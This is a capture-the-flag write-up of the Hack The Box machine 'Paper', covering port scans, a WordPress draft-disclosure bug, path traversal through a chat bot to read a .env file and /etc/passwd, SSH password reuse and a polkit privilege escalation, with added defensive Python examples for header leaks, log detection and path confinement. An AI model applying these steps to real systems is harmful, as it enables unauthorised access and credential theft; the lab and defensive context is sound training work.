Paper-Hack The Box

Scope of the work

The scope of this machine is to retrieve the two flags as proof of exploitation.

  • user.txt
  • root.txt

HackTheBox has provided the following scope allowances:

  • Any tools or techniques are permitted in this engagement; however, we ask that you attempt manual exploitation first
  • Locate and report all vulnerabilities found
  • Submit the flags discovered to the dashboard
  • Only the IP address assigned to your machine is in scope

Reconnaissance

This machine is a medium-difficulty boot2root machine with the IP address 10.10.11.143.

Running an nmap scan with -sC (default script scan) and -sV (version detection):

┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$ cat nmap/paper.nmap
# Nmap 7.92 scan initiated Mon Mar 14 04:28:53 2022 as: nmap -sC -sV -oA nmap/paper 10.10.11.143
Nmap scan report for 10.10.11.143
Host is up (0.33s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_ssl-date: TLS randomness does not represent time
|_http-title: 400 Bad Request
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 14 04:29:22 2022 -- 1 IP address (1 host up) scanned in 29.24 seconds
┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$

From the nmap scan result, we find three open ports: 22, 80 and 443, running ssh, http and https respectively.

There might be other ports open, so let’s run a full port scan with nmap (-p-):

┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$ cat nmap/all-port.nmap
# Nmap 7.92 scan initiated Mon Mar 14 04:32:17 2022 as: nmap -p- -oA nmap/all-port 10.10.11.143
Nmap scan report for 10.10.11.143
Host is up (0.086s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
# Nmap done at Mon Mar 14 04:37:58 2022 -- 1 IP address (1 host up) scanned in 341.63 seconds

Enumerating HTTP

Let’s enumerate the website that is running. After checking the sites on ports 80 and 443, there is nothing of interest to display.

homepage

I ran gobuster in the background but found nothing that piqued my interest, so I decided to check the HTTP response.

Let’s run curl with the -I flag. -I sends a HEAD request and prints only the HTTP response headers, which can include things like the server name, cookies, the document date, the HTTP version and more.

┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$ curl -I 10.10.11.143
HTTP/1.1 403 Forbidden
Date: Mon, 14 Mar 2022 11:09:15 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8

The X-Backend-Server header reveals that the server serves a backend host named “office.paper”. Let’s add this domain to our hosts file:

┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$ cat /etc/hosts | grep office
10.10.11.143 office.paper
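The header check above is a small but recurring defensive lesson: a single disclosure header handed over an internal hostname. The following is an added example, not code from the original write-up, that parses a raw `curl -I` response, flags headers that leak infrastructure details and pulls out any hostnames they disclose. The response block is the one shown above, embedded as a constructed sample; the header list and helper names are my own.

```python
"""Added example (not from the original write-up): flag response headers that
leak infrastructure details, such as the X-Backend-Server header seen above."""
import re

# Constructed sample: the header block curl -I returned in the write-up.
RAW_RESPONSE = """HTTP/1.1 403 Forbidden
Date: Mon, 14 Mar 2022 11:09:15 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8
"""

# Headers whose presence discloses software versions or internal names
# (assumed list for this example; extend it for your environment).
DISCLOSURE_HEADERS = {"server", "x-powered-by", "x-backend-server",
                      "x-aspnet-version", "via"}

# A DNS-style name: labels of letters, digits and hyphens, at least one dot.
HOSTNAME_RE = re.compile(
    r"^[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)+$", re.I)


def parse_headers(raw):
    """Return (status_line, {lower-case name: value}) from a raw response head."""
    lines = [line for line in raw.splitlines() if line.strip()]
    status = lines[0]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def find_disclosures(raw):
    """Return {header: value} for headers that leak infrastructure details."""
    _, headers = parse_headers(raw)
    return {h: v for h, v in headers.items() if h in DISCLOSURE_HEADERS}


def candidate_vhosts(raw):
    """Return hostnames disclosed in those headers (e.g. via X-Backend-Server).

    Values are split on whitespace and punctuation; tokens such as
    'Apache/2.4.37' or 'centos' do not match the hostname pattern, while
    'office.paper' does. Purely numeric tokens (version numbers) are skipped."""
    found = set()
    for value in find_disclosures(raw).values():
        for token in re.split(r"[\s,;()]+", value):
            if HOSTNAME_RE.match(token) and not re.fullmatch(r"[\d.]+", token):
                found.add(token.lower())
    return sorted(found)


if __name__ == "__main__":
    for name, value in find_disclosures(RAW_RESPONSE).items():
        print(f"disclosure: {name}: {value}")
    print("candidate vhosts:", candidate_vhosts(RAW_RESPONSE))
```

On the server side the equivalent fix is to stop emitting such headers: Apache's `ServerTokens Prod` trims the Server banner, and `Header unset X-Backend-Server` (mod_headers) removes the custom header that leaked the vhost here.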

With the hosts entry in place, http://office.paper serves a different site.

Wappalyzer reveals that the website is running WordPress version 5.2.3. Let’s run wpscan in the background and, in the meantime, enumerate the website manually.

message

While enumerating I found a comment from Nick to Michael asking him to remove the secret content from the drafts. However, to view the drafts we need admin credentials, which we don’t have yet.

┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$ wpscan --url http://office.paper/ -e vp,vt,u -o web/wpscan
┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$ cat web/wpscan
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://office.paper/ [10.10.11.143]
[+] Started: Mon Mar 14 04:43:33 2022
Interesting Finding(s):

[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| - X-Powered-By: PHP/7.2.24
| - X-Backend-Server: office.paper
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress readme found: http://office.paper/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
| Found By: Rss Generator (Passive Detection)
| - http://office.paper/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
| - http://office.paper/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
[+] WordPress theme in use: construction-techup
| Location: http://office.paper/wp-content/themes/construction-techup/
| Last Updated: 2021-07-17T00:00:00.000Z
| Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt
| [!] The version is out of date, the latest version is 1.4
| Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1
| Style Name: Construction Techup
| Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a...
| Author: wptexture
| Author URI: https://testerwp.com/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1'

[i] No plugins Found.
[i] No themes Found.
[i] User(s) Identified:

[+] prisonmike
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://office.paper/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] nick
| Found By: Wp Json Api (Aggressive Detection)
| - http://office.paper/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] creedthoughts
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Mar 14 04:43:55 2022
[+] Requests Done: 496
[+] Cached Requests: 40
[+] Data Sent: 129.417 KB
[+] Data Received: 207.426 KB
[+] Memory used: 295.867 MB
[+] Elapsed time: 00:00:21
┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$

A quick Google search reveals that this version is vulnerable to CVE-2019-17671, which allows an unauthenticated user to view certain private content because WordPress mishandles the static query property.
To trigger it we append the query ?static=1 to the site URL. This gives us access to a page with the following content.
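From the defender's side, the same query string that exposes drafts on an unpatched WordPress 5.2.3 is easy to spot in web server logs. The following is an added example, not code from the original write-up, that parses Apache combined-format access-log lines and reports every request carrying `static=1`, grouped by source address. The log lines are constructed for the example (the addresses, paths and user agents are made up), and the function names are my own.

```python
"""Added example (not part of the original write-up): scan Apache access-log
lines for requests that use the ?static=1 query parameter abused in
CVE-2019-17671, so a defender can spot probing of an unpatched WordPress 5.2.3."""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
10.10.14.23 - - [14/Mar/2022:11:20:01 +0000] "GET / HTTP/1.1" 200 19942 "-" "Mozilla/5.0"
10.10.14.23 - - [14/Mar/2022:11:20:05 +0000] "GET /?static=1 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.10.14.23 - - [14/Mar/2022:11:20:09 +0000] "GET /index.php/feed/ HTTP/1.1" 200 3001 "-" "WPScan v3.8.20"
10.10.14.40 - - [14/Mar/2022:11:21:00 +0000] "GET /?static=1&p=3 HTTP/1.1" 200 8123 "-" "curl/7.81.0"
10.10.14.41 - - [14/Mar/2022:11:21:30 +0000] "GET /?statistics=1 HTTP/1.1" 404 200 "-" "curl/7.81.0"
"""

# client ident user [timestamp] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_static_probe(entry):
    """True when the query string carries static=1 (the CVE-2019-17671 trigger).

    parse_qs is used rather than a substring match so that a parameter such as
    'statistics=1' is not mistaken for 'static=1'."""
    query = urlsplit(entry["target"]).query
    return "1" in parse_qs(query).get("static", [])


def find_static_probes(log_text):
    """Return the parsed entries whose query string contains static=1."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_static_probe(entry):
            hits.append(entry)
    return hits


def probes_per_source(log_text):
    """Count static=1 requests per client IP, for triage."""
    return Counter(entry["ip"] for entry in find_static_probes(log_text))


if __name__ == "__main__":
    for entry in find_static_probes(SAMPLE_LOG):
        print(f'{entry["ts"]} {entry["ip"]} {entry["method"]} '
              f'{entry["target"]} -> {entry["status"]}')
    print(dict(probes_per_source(SAMPLE_LOG)))
```

Treat a hit as a triage signal rather than proof of compromise: `static` is also a legitimate WordPress query variable, so a site that is already patched (5.2.4 or later) will log the same requests harmlessly. The durable fix is updating WordPress; the log rule tells you who was probing while it was unpatched.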

And we get the secret content Nick was mentioning, which tells us about a new vhost and a registration URL. Let’s add the vhost to the /etc/hosts file:

┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$ cat /etc/hosts | grep office
10.10.11.143 office.paper chat.office.paper

Going to the URL, we get the registration form. Let’s register ourselves.

registration form

Upon login, this account gives access to several channels, including a general conversation among the company’s employees. From that discussion we learn that dwight has created a bot: its list command lists the sales directory, and its file command shows the content of a file.

general discussion

I start a private conversation with this bot and test some commands:

I use the list and file commands to get the content of the directory, then try path traversal with ../ . Bingo, we get the list of files from the parent folder. There is a hubot directory in the parent folder, which must hold the bot’s source code. Within the hubot directory there is a .env file that piques my interest: this kind of file generally contains environment variables and possibly credentials.
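The root cause here is a file command that joins user input onto a base directory without checking where the result lands. The following is an added example, not the Paper bot’s real code: the unsafe join the write-up describes beside a hardened version that resolves the path and refuses anything outside the sales directory. It builds a throwaway directory layout inline (a sales folder next to a hubot/.env holding a constructed placeholder, not the real secret); the function names are my own.

```python
"""Added example (not the Paper bot's real code): unsafe path handling next to
a hardened version that confines the bot's list/file commands to the sales
directory. The directory layout is constructed in a temporary folder."""
import os
import tempfile


def build_sandbox():
    """Construct a throwaway layout mirroring the write-up: sales/ beside hubot/.env."""
    root = tempfile.mkdtemp()
    sales = os.path.join(root, "sales")
    hubot = os.path.join(root, "hubot")
    os.makedirs(os.path.join(sales, "sale"))
    os.makedirs(hubot)
    with open(os.path.join(sales, "sale", "portfolio.txt"), "w") as f:
        f.write("quarterly numbers\n")
    with open(os.path.join(hubot, ".env"), "w") as f:
        f.write("BOT_PASSWORD=placeholder\n")  # constructed placeholder, not a real secret
    return sales


def read_file_unsafe(base, user_path):
    """Vulnerable: joins the user-supplied path onto base and reads whatever it hits.

    '../hubot/.env' walks out of the sales directory, which is the behaviour
    the write-up exploits."""
    with open(os.path.join(base, user_path)) as f:
        return f.read()


def resolve_confined(base, user_path):
    """Resolve user_path under base and refuse anything that escapes it.

    realpath() collapses '..' and follows symlinks, so a link planted inside
    the sales folder cannot be used to point outside it either. An absolute
    user_path makes os.path.join discard base, and is rejected the same way."""
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, user_path))
    if os.path.commonpath([base_real, target]) != base_real:
        raise PermissionError(f"path escapes sales directory: {user_path!r}")
    return target


def read_file_safe(base, user_path):
    """Hardened replacement for the bot's file command."""
    with open(resolve_confined(base, user_path)) as f:
        return f.read()


def list_dir_safe(base, user_path="."):
    """Hardened replacement for the bot's list command."""
    return sorted(os.listdir(resolve_confined(base, user_path)))


def demo():
    """Run both versions against the sandbox and report what each allowed."""
    sales = build_sandbox()
    leaked = read_file_unsafe(sales, "../hubot/.env")  # the vulnerable path succeeds
    results = {
        "unsafe_leaks_env": "BOT_PASSWORD" in leaked,
        "safe_listing": list_dir_safe(sales),
        "safe_read": read_file_safe(sales, "sale/portfolio.txt").strip(),
    }
    for key, attempt in (("safe_blocks_traversal", "../hubot/.env"),
                         ("safe_blocks_absolute", "/etc/passwd")):
        try:
            resolve_confined(sales, attempt)
            results[key] = False
        except PermissionError:
            results[key] = True
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The check compares the resolved target against the resolved base with `os.path.commonpath`, which avoids the classic mistake of a plain `startswith` test (where `/srv/sales-archive` would pass as inside `/srv/sales`). Secrets in a `.env` file next to the bot are still a risk on their own; the confinement only stops the bot from being the thing that reads them.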

credentials

Now we have the credentials. We can try logging into the chat system with them, but no luck there.

login as recyclops

I tried connecting via ssh as the recyclops user, and again no luck. I then read the content of the /etc/passwd file to get the list of available users. Connecting via ssh as the dwight user with that password worked.

┌──(kali㉿kali)-[~/Desktop/htb/paper]
└─$ ssh dwight@10.10.11.143
dwight@10.10.11.143's password:
Activate the web console with: systemctl enable --now cockpit.socket
Last login: Tue Feb 1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$ id
uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)
[dwight@paper ~]$

Privilege escalation

Now we have a shell. I start by running the linPEAS script to get a first list of candidate exploits. For that I upload the file to the machine and execute it.

After analyzing the linPEAS result, I found that this machine is vulnerable to CVE-2021-3560. CVE-2021-3560 is an authentication bypass in polkit, which allows an unprivileged user to call privileged methods over D-Bus. I find a script that exploits it and creates a root session.

linPEAS result analysis

[dwight@paper ~]$ nano exploit.py
[dwight@paper ~]$ python3 exploit.py
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse
For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
**************
[+] Starting the Exploit
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user

--------------SNIP--------------

The user.txt flag is located in dwight’s home directory and root.txt in the root directory.

Arjun Aryal

Cyber Security Enthusiast | CTF challenge solving | Python programmer